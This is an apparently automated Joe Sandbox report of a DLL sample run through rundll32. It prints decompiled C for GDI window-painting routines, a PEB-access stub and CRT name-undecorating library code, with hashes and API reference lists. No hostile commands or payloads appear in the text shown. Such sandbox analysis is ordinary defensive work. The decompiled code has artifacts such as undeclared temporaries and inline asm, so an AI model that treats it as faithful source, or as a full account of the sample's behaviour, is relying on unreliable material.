Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93ce1a00d23dfb0527f68975886b101968f7ce1ea99dee50bd5d74cdbc1fed38
Instruction ID: 18467db992a203f67c367f55b36483cc5fe9a7cfd7d8114d5e86e5a373ec6e19
Opcode Fuzzy Hash: 93ce1a00d23dfb0527f68975886b101968f7ce1ea99dee50bd5d74cdbc1fed38
Instruction Fuzzy Hash: 8DE0E275901248EFCB00CBA8D949B8AB7F8EB48794F9548A4E406D7251D234EE84DA00

Uniqueness

Uniqueness Score: -1.00%

Function 100106EC, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aaddc5db4e4dbc8d892f858668c81b58ac47308af31a2acdb06c3053e85c31d
Instruction ID: 92053149608c008e6d3a1dda8c581314329947f6a8f32726ea4c00aae5d3069a
Opcode Fuzzy Hash: 2aaddc5db4e4dbc8d892f858668c81b58ac47308af31a2acdb06c3053e85c31d
Instruction Fuzzy Hash: 57C01238A14E4046CA05C91092B1BA43398E382AC2F80058CE4430A682D56AAD87DE00

Uniqueness

Uniqueness Score: -1.00%

Function 00B2C4FF, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B2C4FF() {

				return  *[fs:0x30];
			}

0x00b2c505

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1000168B, Relevance: 96.6, APIs: 54, Strings: 1, Instructions: 309
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000168B(struct HWND__* _a4) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				struct tagPAINTSTRUCT _v120;
				struct HRGN__* _v124;
				struct HDC__* _v128;
				int _v132;
				struct tagPOINT _v140;
				struct HWND__* _v144;
				struct HWND__* _v148;
				signed int _v152;
				void* _v156;
				struct HWND__* _v160;
				struct tagPOINT _v168;
				void* __ebp;
				signed int _t82;
				signed int _t97;
				long _t99;
				struct HBRUSH__* _t107;
				void* _t119;
				void* _t120;
				void* _t130;
				struct HRGN__* _t141;
				struct HRGN__* _t144;
				struct HWND__* _t152;
				int _t153;
				int _t156;
				void* _t159;
				struct HMENU__* _t160;
				struct HRGN__* _t162;
				int _t164;
				struct HRGN__* _t169;
				struct HDC__* _t170;
				void* _t171;
				struct HDC__* _t172;
				struct HDC__* _t173;
				struct HDC__* _t177;
				signed int _t178;

				_t82 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t82 ^ _t178;
				_t152 = _a4;
				_v156 = _t152;
				_v148 = 0;
				_v144 = 0;
				GetClientRect(_t152,  &_v24);
				_t160 = GetSubMenu(GetMenu(_t152), 1);
				_v132 = _t160;
				if((GetMenuState(_t160, 0xca, 0) & 0x00000008) == 0) {
					_v160 = 0;
					_t169 = CreateRectRgnIndirect( &_v24);
					CombineRgn(_t169, _t169,  *0x1004dbcc, 4);
					if( *0x1004dc35 != 0) {
						_v140.x = 0;
						_v140.y = 0;
						MapWindowPoints(_t152, 0,  &_v140, 1);
						OffsetRgn(_t169, _v140, _v140.y);
					}
					_t170 = GetDCEx(_t152, _t169, 0x42);
					_v128 = _t170;
					SendMessageA(_t152, 0x14, _t170, 0);
					ValidateRect(_t152, 0);
				} else {
					_v160 = 1;
					_t170 = BeginPaint(_t152,  &_v120);
					_v128 = _t170;
				}
				_v124 = SaveDC(_t170);
				_t97 = GetMenuState(_t160, 0xcd, 0) & 0x00000008;
				_v152 = _t97;
				if(_t97 != 0) {
					asm("movd xmm0, dword [ebp-0x8]");
					asm("cvtdq2pd xmm0, xmm0");
					asm("movsd");
					asm("movsd");
					asm("mulsd xmm0, [0x10042370]");
					asm("movsd");
					asm("cvttsd2si eax, xmm0");
					asm("movsd");
					asm("movd xmm0, dword [ebp-0x18]");
					asm("cvtdq2pd xmm0, xmm0");
					_v40.top = _t97;
					asm("mulsd xmm0, [0x10042380]");
					asm("cvttsd2si eax, xmm0");
					_v40.bottom = _t97;
					_t144 = CreateEllipticRgnIndirect( &_v40);
					_t177 = _v128;
					_v144 = _t144;
					SelectClipRgn(_t177, _t144);
					SetMetaRgn(_t177);
					_t160 = _v132;
				}
				_t99 = GetMenuState(_t160, 0xcc, 0) & 0x00000008;
				_v140.y = _t99;
				if(_t99 != 0) {
					asm("movd xmm0, dword [ebp-0xc]");
					asm("cvtdq2pd xmm0, xmm0");
					asm("movsd");
					asm("movsd");
					asm("mulsd xmm0, [0x10042370]");
					asm("movsd");
					asm("cvttsd2si eax, xmm0");
					asm("movsd");
					asm("movd xmm0, dword [ebp-0x2c]");
					asm("cvtdq2pd xmm0, xmm0");
					_v56.left = _t99;
					asm("mulsd xmm0, [0x10042378]");
					asm("cvttsd2si eax, xmm0");
					_v56.right = _t99;
					_t141 = CreateEllipticRgnIndirect( &_v56);
					_v148 = _t141;
					SelectClipRgn(_v128, _t141);
				}
				_t171 = CreateSolidBrush(0x8080ff);
				FillRect(_v128,  &_v24, _t171);
				DeleteObject(_t171);
				_t172 = _v128;
				RestoreDC(_t172, _v124);
				_v124 = CreateRectRgn(0, 0, 0, 0);
				_t107 = CreateSolidBrush(0xff);
				_v132 = _t107;
				if( *0x1004dc35 == 0) {
					_t162 = _v124;
				} else {
					_v168.x = 0;
					_v168.y = 0;
					MapWindowPoints(0, _t152,  &_v168, 1);
					_t162 = _v124;
					OffsetRgn(_t162, _v168, _v168.y);
					_t107 = _v132;
				}
				FrameRgn(_t172, _t162, _t107, 3, 3);
				DeleteObject(_v132);
				DeleteObject(_v124);
				_t173 = GetDC(_t152);
				if(_v152 != 0) {
					_v132 = SaveDC(_t173);
					SelectClipRgn(_t173, _v144);
					SetMetaRgn(_t173);
					_t130 = CreatePen(0, 1, 0x800080);
					_v124 = _t130;
					SelectObject(_t173, _t130);
					_t156 = _v24.top;
					if(_t156 < _v24.bottom) {
						_t153 = _t156;
						do {
							MoveToEx(_t173, 0, _t153, 0);
							LineTo(_t173, _v24.right, _t153);
							_t153 = _t153 + 0xa;
						} while (_t153 < _v24.bottom);
						_t152 = _v156;
					}
					RestoreDC(_t173, _v132);
					DeleteObject(_v124);
					DeleteObject(_v144);
				}
				if(_v140.y != 0) {
					SelectClipRgn(_t173, _v148);
					_t119 = CreatePen(0, 1, 0xff0000);
					_v156 = _t119;
					_t120 = SelectObject(_t173, _t119);
					_t164 = _v24.left;
					_v140.y = _t120;
					if(_t164 < _v24.right) {
						do {
							MoveToEx(_t173, _t164, 0, 0);
							LineTo(_t173, _t164, _v24.bottom);
							_t164 = _t164 + 0xa;
						} while (_t164 < _v24.right);
						_t120 = _v140.y;
					}
					SelectObject(_t173, _t120);
					DeleteObject(_v156);
					SelectClipRgn(_t173, 0);
					DeleteObject(_v148);
				}
				ReleaseDC(_t152, _t173);
				if(_v160 == 0) {
					ReleaseDC(_t152, _v128);
				} else {
					EndPaint(_t152,  &_v120);
				}
				return E100037EA(0, _v8 ^ _t178, _t159);
			}

0x10001694
0x1000169b
0x1000169f
0x100016aa
0x100016b1
0x100016b7
0x100016bd
0x100016d4
0x100016dc
0x100016e7
0x1000170b
0x10001720
0x10001724
0x10001731
0x10001740
0x10001746
0x1000174c
0x1000175f
0x1000175f
0x10001771
0x10001777
0x1000177a
0x10001783
0x100016e9
0x100016ec
0x100016fe
0x10001700
0x10001700
0x10001798
0x100017a1
0x100017a4
0x100017aa
0x100017ac
0x100017b4
0x100017bb
0x100017bc
0x100017bd
0x100017c5
0x100017c6
0x100017ca
0x100017cb
0x100017d0
0x100017d4
0x100017d7
0x100017df
0x100017e3
0x100017ea
0x100017f0
0x100017f5
0x100017fb
0x10001802
0x10001808
0x10001808
0x10001819
0x1000181c
0x10001822
0x10001824
0x1000182c
0x10001833
0x10001834
0x10001835
0x1000183d
0x1000183e
0x10001842
0x10001843
0x10001848
0x1000184c
0x1000184f
0x10001857
0x1000185b
0x10001862
0x1000186c
0x10001872
0x10001872
0x10001885
0x1000188f
0x10001896
0x1000189f
0x100018a3
0x100018ba
0x100018bd
0x100018c6
0x100018c9
0x10001905
0x100018cb
0x100018d8
0x100018de
0x100018e4
0x100018f0
0x100018fa
0x10001900
0x10001900
0x1000190f
0x1000191e
0x10001923
0x10001933
0x10001935
0x10001944
0x10001948
0x1000194f
0x1000195e
0x10001966
0x10001969
0x1000196f
0x10001975
0x10001977
0x10001979
0x1000197f
0x1000198a
0x10001990
0x10001993
0x10001998
0x10001998
0x100019a2
0x100019ab
0x100019b3
0x100019b3
0x100019bc
0x100019c9
0x100019d8
0x100019e0
0x100019e6
0x100019ec
0x100019ef
0x100019f8
0x100019fa
0x10001a00
0x10001a0b
0x10001a11
0x10001a14
0x10001a19
0x10001a19
0x10001a21
0x10001a33
0x10001a38
0x10001a44
0x10001a44
0x10001a4e
0x10001a57
0x10001a6a
0x10001a59
0x10001a5e
0x10001a5e
0x10001a7c

APIs

GetClientRect.USER32 ref: 100016BD
GetMenu.USER32 ref: 100016C4
GetSubMenu.USER32 ref: 100016CD
GetMenuState.USER32(00000000,000000CA,00000000), ref: 100016DF
BeginPaint.USER32(?,?), ref: 100016F8
CreateRectRgnIndirect.GDI32(?), ref: 10001712
CombineRgn.GDI32(00000000,00000000,00000004), ref: 10001724
MapWindowPoints.USER32 ref: 1000174C
OffsetRgn.GDI32(00000000,?,?), ref: 1000175F
GetDCEx.USER32 ref: 10001769
SendMessageA.USER32 ref: 1000177A
ValidateRect.USER32(?,00000000), ref: 10001783
SaveDC.GDI32(00000000), ref: 1000178A
GetMenuState.USER32(00000000,000000CD,00000000), ref: 1000179B
CreateEllipticRgnIndirect.GDI32(?), ref: 100017EA
SelectClipRgn.GDI32(?,00000000), ref: 100017FB
SetMetaRgn.GDI32(?), ref: 10001802
GetMenuState.USER32(00000000,000000CC,00000000), ref: 10001813
CreateEllipticRgnIndirect.GDI32(?), ref: 10001862
SelectClipRgn.GDI32(?,00000000), ref: 10001872
CreateSolidBrush.GDI32(008080FF), ref: 10001883
FillRect.USER32(?,?,00000000), ref: 1000188F
DeleteObject.GDI32(00000000), ref: 10001896
RestoreDC.GDI32(?,?), ref: 100018A3
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100018AF
CreateSolidBrush.GDI32(000000FF), ref: 100018BD
MapWindowPoints.USER32 ref: 100018E4
OffsetRgn.GDI32(?,?,?), ref: 100018FA
FrameRgn.GDI32(?,?,00000000,00000003,00000003), ref: 1000190F
DeleteObject.GDI32(?), ref: 1000191E
DeleteObject.GDI32(?), ref: 10001923
GetDC.USER32(?), ref: 10001926
SaveDC.GDI32(00000000), ref: 10001938
SelectClipRgn.GDI32(00000000,?), ref: 10001948
SetMetaRgn.GDI32(00000000), ref: 1000194F
CreatePen.GDI32(00000000,00000001,00800080), ref: 1000195E
SelectObject.GDI32(00000000,00000000), ref: 10001969
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 1000197F
LineTo.GDI32(00000000,?,?), ref: 1000198A
RestoreDC.GDI32(00000000,?), ref: 100019A2
DeleteObject.GDI32(?), ref: 100019AB
DeleteObject.GDI32(?), ref: 100019B3
SelectClipRgn.GDI32(00000000,?), ref: 100019C9
CreatePen.GDI32(00000000,00000001,00FF0000), ref: 100019D8
SelectObject.GDI32(00000000,00000000), ref: 100019E6
MoveToEx.GDI32(00000000,?,00000000,00000000), ref: 10001A00
LineTo.GDI32(00000000,?,?), ref: 10001A0B
SelectObject.GDI32(00000000,00000000), ref: 10001A21
DeleteObject.GDI32(?), ref: 10001A33
SelectClipRgn.GDI32(00000000,00000000), ref: 10001A38
DeleteObject.GDI32(?), ref: 10001A44
ReleaseDC.USER32(?,00000000), ref: 10001A4E
EndPaint.USER32(?,?), ref: 10001A5E
ReleaseDC.USER32(?,?), ref: 10001A6A

Strings

333333?bad allocation, xrefs: 100017D7

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Object$CreateSelect$Delete$ClipMenuRect$IndirectState$BrushEllipticLineMetaMoveOffsetPaintPointsReleaseRestoreSaveSolidWindow$BeginClientCombineFillFrameMessageSendValidate
String ID: 333333?bad allocation
API String ID: 1726318560-423781954
Opcode ID: 682ad894c4e66abcb482285e08704e5de5c6abde572e8e8bafc112f18911f1dd
Instruction ID: ec48b5f3750a01a1299650892f8a478bee22796d16189536311e5406ba00b7dd
Opcode Fuzzy Hash: 682ad894c4e66abcb482285e08704e5de5c6abde572e8e8bafc112f18911f1dd
Instruction Fuzzy Hash: 1CC13C71A00228EFEB229FA0CE88B9EBBB9FF4A341F504055F605F6161DB755A41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 100014BD, Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E100014BD(struct HWND__* _a4, int _a12, int _a16) {
				struct HDC__* _v8;
				int _v12;
				int _v16;
				intOrPtr _t32;
				struct HDC__* _t37;
				intOrPtr* _t40;
				intOrPtr _t41;
				void* _t47;
				intOrPtr _t53;
				void* _t55;
				int _t58;
				intOrPtr* _t59;
				int _t63;
				intOrPtr* _t64;
				struct HDC__* _t65;

				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0 &&  *0x1004dc34 != 0) {
					_t53 =  *0x1004dc38; // 0x4f3c70
					_t4 = _t53 + 4; // 0x4f3c70
					_t32 =  *_t4;
					_t5 = _t32 + 8; // 0x0
					_t6 = _t32 + 0xc; // 0x0
					_v16 = _a12;
					_v12 = _a16;
					_push( &_v16);
					E10001102(_t55, _t53);
					_t37 = GetDC(_a4);
					_v8 = _t37;
					MoveToEx(_t37,  *_t5,  *_t6, 0);
					LineTo(_v8, _v16, _v12);
					_t40 =  *0x1004dc38; // 0x4f3c70
					_t41 =  *_t40;
					_t63 =  *(_t41 + 0xc);
					_t58 =  *(_t41 + 8);
					LineTo(_v8, _t58, _t63);
					BeginPath(_v8);
					MoveToEx(_v8, _t58, _t63, 0);
					_t59 =  *0x1004dc38; // 0x4f3c70
					_t64 =  *_t59;
					if(_t64 != _t59) {
						while(1) {
							_t64 =  *_t64;
							if(_t64 == _t59) {
								goto L6;
							}
							LineTo(_v8,  *(_t64 + 8),  *(_t64 + 0xc));
						}
					}
					L6:
					_t65 = _v8;
					CloseFigure(_t65);
					EndPath(_t65);
					_t47 =  *0x1004dbcc; // 0x0
					if(_t47 != 0) {
						DeleteObject(_t47);
						 *0x1004dbcc =  *0x1004dbcc & 0x00000000;
					}
					 *0x1004dbcc = PathToRegion(_t65);
					ReleaseDC(_a4, _t65);
					RedrawWindow(_a4, 0, 0, 0x105);
					 *0x1004dc34 = 0;
				}
				return 0;
			}

0x100014e5
0x100014f8
0x10001500
0x10001500
0x10001503
0x10001506
0x1000150c
0x10001512
0x10001518
0x1000151f
0x10001527
0x10001532
0x10001535
0x10001544
0x1000154a
0x1000154f
0x10001551
0x10001554
0x1000155c
0x10001565
0x10001572
0x10001578
0x1000157e
0x10001582
0x10001595
0x10001595
0x10001599
0x00000000
0x00000000
0x1000158f
0x1000158f
0x10001595
0x1000159b
0x1000159b
0x1000159f
0x100015a6
0x100015ac
0x100015b3
0x100015b6
0x100015bc
0x100015bc
0x100015ce
0x100015d3
0x100015e5
0x100015ec
0x100015f3
0x100015f7

APIs

GetMenu.USER32 ref: 100014C6
GetSubMenu.USER32 ref: 100014CF
GetMenuState.USER32(00000000,000000CB,00000000), ref: 100014DD

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

GetDC.USER32(?), ref: 10001527
MoveToEx.GDI32(00000000,00000000,00000000,00000000), ref: 10001535
LineTo.GDI32(?,?,?), ref: 10001544
LineTo.GDI32(?,?,?), ref: 1000155C
BeginPath.GDI32(?), ref: 10001565
MoveToEx.GDI32(?,?,?,00000000), ref: 10001572
LineTo.GDI32(?,?,?), ref: 1000158F
CloseFigure.GDI32(?), ref: 1000159F
EndPath.GDI32(?), ref: 100015A6
DeleteObject.GDI32(00000000), ref: 100015B6
PathToRegion.GDI32(?), ref: 100015C4
ReleaseDC.USER32(?,?), ref: 100015D3
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 100015E5

Strings

p<O, xrefs: 100014F8, 1000151A, 1000154A, 10001578

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: LineMenuPath$Move$BeginCloseDeallocateDeleteFigureObjectRedrawRegionReleaseStateWindow
String ID: p<O
API String ID: 3279537990-1042322620
Opcode ID: 22e4b22e0efdb5f74bec913847a42e61d660f659a6178cf68644454104272bd8
Instruction ID: 236d3021e18466ba726e930eba69d07649331866de6a3b4fa2b3998426ac5257
Opcode Fuzzy Hash: 22e4b22e0efdb5f74bec913847a42e61d660f659a6178cf68644454104272bd8
Instruction Fuzzy Hash: 8F310735A01224EFEB11AFA4CE88B8A7BB5FF4A351F518055FA05E7271C770A940DB98

Uniqueness

Uniqueness Score: -1.00%

Function 1000A54C, Relevance: 28.8, APIs: 19, Instructions: 339
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E1000A54C(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				char _v52;
				void* __ebx;
				void* _t105;
				signed int* _t107;
				signed int _t110;
				unsigned int _t111;
				void* _t115;
				void* _t129;
				unsigned int _t134;
				void* _t142;
				void* _t148;
				intOrPtr* _t149;
				intOrPtr* _t152;
				unsigned int _t154;
				signed char _t156;
				void* _t162;
				intOrPtr* _t163;
				signed int _t165;
				signed int _t169;
				void* _t172;
				signed int* _t174;
				signed int _t181;
				signed int _t185;
				void* _t189;
				intOrPtr* _t190;
				void* _t191;
				signed int _t195;
				unsigned int _t205;
				void* _t235;
				signed int _t253;
				signed int _t257;
				intOrPtr* _t260;
				intOrPtr* _t261;
				void* _t262;
				void* _t263;

				_t198 =  *0x1004e004; // 0x0
				_t263 = _t262 - 0x30;
				_t105 =  *_t198;
				if(_t105 == 0) {
					L50:
					E10007662(_t198, _a4, 1, _a8);
					L51:
					_t107 = _a4;
					L52:
					return _t107;
				}
				if(_t105 < 0x36 || _t105 > 0x39) {
					if(_t105 != 0x5f) {
						goto L49;
					}
					goto L4;
				} else {
					L4:
					_t195 = _t105 - 0x36;
					_t198 = _t198 + 1;
					 *0x1004e004 = _t198;
					if(_t195 != 0x29) {
						__eflags = _t195;
						if(_t195 < 0) {
							L49:
							_t107 = _a4;
							_t107[1] = _t107[1] & 0x00000000;
							 *_t107 =  *_t107 & 0x00000000;
							_t107[1] = 2;
							goto L52;
						}
						_t253 = _t198;
						__eflags = _t195 - 3;
						if(__eflags > 0) {
							goto L49;
						}
						L11:
						if(_t195 == 0xffffffff) {
							goto L49;
						}
						_t260 = _a8;
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v12 =  *_t260;
						_v8 =  *((intOrPtr*)(_t260 + 4));
						_t110 = 2;
						_t257 = _t195 & _t110;
						if(_t257 == 0) {
							L23:
							if((_t195 & 0x00000004) != 0) {
								_t154 =  *0x1004e00c; // 0x0
								_t156 =  !(_t154 >> 1);
								_t282 = _t156 & 0x00000001;
								_push( &_v52);
								if((_t156 & 0x00000001) == 0) {
									E1000792E( &_v12, E10008C87(_t253, __eflags));
								} else {
									_t162 = E10007637(_t198,  &_v44, 0x20, E10008C87(_t253, _t282));
									_t263 = _t263 + 0x10;
									_t163 = E100076A6(_t162,  &_v28,  &_v12);
									_v12 =  *_t163;
									_v8 =  *((intOrPtr*)(_t163 + 4));
								}
							}
							_t111 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if(( !(_t111 >> 1) & 0x00000001) == 0) {
								_t115 = E10009326();
								_t200 =  &_v12;
								E1000792E( &_v12, _t115);
							} else {
								_t152 = E100076A6(E10009326(),  &_v44,  &_v12);
								_t200 =  *_t152;
								_v12 =  *_t152;
								_v8 =  *((intOrPtr*)(_t152 + 4));
							}
							if( *_t260 != 0) {
								_t148 = E10007637(_t200,  &_v52, 0x28,  &_v12);
								_t263 = _t263 + 0xc;
								_t149 = E100076C8(_t148,  &_v44, 0x29);
								_v12 =  *_t149;
								_v8 =  *((intOrPtr*)(_t149 + 4));
							}
							_t261 = E1000A9CF(0x1004e020, 8);
							if(_t261 == 0) {
								_t261 = 0;
							} else {
								 *_t261 = 0;
								 *((intOrPtr*)(_t261 + 4)) = 0;
							}
							E1000B7CC(0,  &_v36, _t261);
							E100077A0( &_v12, E100076C8(E10007637(0x1004e020,  &_v44, 0x28, E1000892F( &_v52)),  &_v28, 0x29));
							_t205 =  *0x1004e00c; // 0x0
							if((_t205 & 0x00000060) != 0x60 && _t257 != 0) {
								E100077A0( &_v12,  &_v20);
								_t205 =  *0x1004e00c; // 0x0
							}
							_push( &_v52);
							if(( !(_t205 >> 0x13) & 0x00000001) == 0) {
								_t129 = E1000B6A3(_t253);
								_t209 =  &_v12;
								E1000792E( &_v12, _t129);
							} else {
								_t142 = E1000B6A3(_t253);
								_t209 =  &_v12;
								E100077A0( &_v12, _t142);
							}
							E100077A0( &_v12, E1000AA59(_t209,  &_v52));
							_t134 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if(( !(_t134 >> 8) & 0x00000001) == 0) {
								E1000792E( &_v12, E1000C728());
							} else {
								E100077A0( &_v12, E1000C728());
							}
							_t107 = _a4;
							if(_t261 == 0) {
								_t107[1] = 0;
								_t107[1] = 3;
								 *_t107 = 0;
							} else {
								 *_t261 = _v12;
								 *((intOrPtr*)(_t261 + 4)) = _v8;
								 *_t107 = _v36;
								_t107[1] = _v32;
							}
							goto L52;
						}
						if( *_t198 == 0x40) {
							_t33 = _t253 + 1; // 0x2
							_t165 = _t33;
							 *0x1004e004 = _t165;
							L19:
							_t235 =  *_t165;
							if(_t235 == 0) {
								E100076A6(E100072DE( &_v52, 1), _a4,  &_v12);
								goto L51;
							}
							if(_t235 != 0x40) {
								goto L49;
							}
							 *0x1004e004 = _t165 + 1;
							_t169 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if((_t169 & 0x00000060) == 0x60) {
								_t172 = E1000C6F9();
								_t198 =  &_v20;
								E1000792E( &_v20, _t172);
							} else {
								_t174 = E1000C6F9();
								_t198 =  *_t174;
								_v20 =  *_t174;
								_v16 = _t174[1];
							}
							goto L23;
						}
						_v24 = _t110;
						_v28 = "::";
						_t244 = E1000723E( &_v44,  &_v28);
						E100076A6(_t177,  &_v28,  &_v12);
						_v12 = _v28;
						_v8 = _v24;
						_t181 =  *0x1004e004; // 0x0
						if( *_t181 == 0) {
							E100076A6(E100072DE( &_v52, 1),  &_v28,  &_v12);
							_v12 = _v28;
							_t185 = _v24;
						} else {
							_t189 = E10007637(_t244,  &_v28, 0x20, E1000B7FB(_t253,  &_v44));
							_t263 = _t263 + 0x10;
							_t190 = E100076A6(_t189,  &_v52,  &_v12);
							_t185 =  *(_t190 + 4);
							_v12 =  *_t190;
						}
						_v8 = _t185;
						_t165 =  *0x1004e004; // 0x0
						goto L19;
					}
					_t191 =  *_t198;
					if(_t191 == 0) {
						goto L50;
					} else {
						_t1 = _t198 + 1; // 0x2
						_t253 = _t1;
						_t195 = _t191 - 0x3d;
						_t198 = _t253;
						 *0x1004e004 = _t198;
						if(_t195 < 4 || _t195 > 7) {
							_t195 = _t195 | 0xffffffff;
						}
						goto L11;
					}
				}
			}

0x1000a54f
0x1000a555
0x1000a558
0x1000a55f
0x1000a8ed
0x1000a8f5
0x1000a8fd
0x1000a8fd
0x1000a900
0x1000a904
0x1000a904
0x1000a567
0x1000a56f
0x00000000
0x00000000
0x00000000
0x1000a575
0x1000a575
0x1000a578
0x1000a57b
0x1000a57c
0x1000a585
0x1000a5b1
0x1000a5b3
0x1000a8dd
0x1000a8dd
0x1000a8e0
0x1000a8e4
0x1000a8e7
0x00000000
0x1000a8e7
0x1000a5b9
0x1000a5bb
0x1000a5be
0x00000000
0x00000000
0x1000a5c4
0x1000a5c7
0x00000000
0x00000000
0x1000a5cd
0x1000a5d2
0x1000a5d6
0x1000a5de
0x1000a5e4
0x1000a5e7
0x1000a5e8
0x1000a5ea
0x1000a6d3
0x1000a6d6
0x1000a6d8
0x1000a6df
0x1000a6e1
0x1000a6e6
0x1000a6e7
0x1000a751
0x1000a6e9
0x1000a6f5
0x1000a6fa
0x1000a707
0x1000a711
0x1000a714
0x1000a714
0x1000a6e7
0x1000a756
0x1000a764
0x1000a765
0x1000a789
0x1000a790
0x1000a793
0x1000a767
0x1000a777
0x1000a77c
0x1000a781
0x1000a784
0x1000a784
0x1000a79c
0x1000a7a8
0x1000a7ad
0x1000a7b8
0x1000a7c2
0x1000a7c5
0x1000a7c5
0x1000a7d4
0x1000a7d8
0x1000a7e1
0x1000a7da
0x1000a7da
0x1000a7dc
0x1000a7dc
0x1000a7e8
0x1000a816
0x1000a81b
0x1000a828
0x1000a835
0x1000a83a
0x1000a83a
0x1000a848
0x1000a84c
0x1000a85f
0x1000a866
0x1000a869
0x1000a84e
0x1000a84e
0x1000a855
0x1000a858
0x1000a858
0x1000a87c
0x1000a881
0x1000a890
0x1000a891
0x1000a8ae
0x1000a893
0x1000a89d
0x1000a89d
0x1000a8b3
0x1000a8b8
0x1000a8d2
0x1000a8d5
0x1000a8d9
0x1000a8ba
0x1000a8bd
0x1000a8c2
0x1000a8c8
0x1000a8cd
0x1000a8cd
0x00000000
0x1000a8b8
0x1000a5f3
0x1000a691
0x1000a691
0x1000a694
0x1000a699
0x1000a699
0x1000a69d
0x1000a73d
0x00000000
0x1000a73d
0x1000a6a6
0x00000000
0x00000000
0x1000a6ad
0x1000a6b2
0x1000a6bf
0x1000a6c0
0x1000a719
0x1000a720
0x1000a723
0x1000a6c2
0x1000a6c2
0x1000a6c8
0x1000a6cd
0x1000a6d0
0x1000a6d0
0x00000000
0x1000a6c0
0x1000a5f9
0x1000a602
0x1000a617
0x1000a619
0x1000a621
0x1000a627
0x1000a62a
0x1000a632
0x1000a679
0x1000a681
0x1000a684
0x1000a634
0x1000a644
0x1000a649
0x1000a656
0x1000a65d
0x1000a660
0x1000a660
0x1000a687
0x1000a68a
0x00000000
0x1000a68a
0x1000a587
0x1000a58b
0x00000000
0x1000a591
0x1000a594
0x1000a594
0x1000a597
0x1000a59a
0x1000a59c
0x1000a5a5
0x1000a5ac
0x1000a5ac
0x00000000
0x1000a5a5
0x1000a58b

APIs

DName::operator+.LIBCMT ref: 1000A619
DName::operator+.LIBCMT ref: 1000A656
DName::DName.LIBVCRUNTIME ref: 1000A66A
DName::operator+.LIBCMT ref: 1000A679
DName::operator+.LIBCMT ref: 1000A707
DName::operator|=.LIBCMT ref: 1000A723
DName::DName.LIBVCRUNTIME ref: 1000A72F
DName::operator+.LIBCMT ref: 1000A73D
DName::operator+.LIBCMT ref: 1000A777
DName::operator+.LIBCMT ref: 1000A7B8
UnDecorator::getReturnType.LIBCMT ref: 1000A7E8
operator+.LIBVCRUNTIME ref: 1000A8F5

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
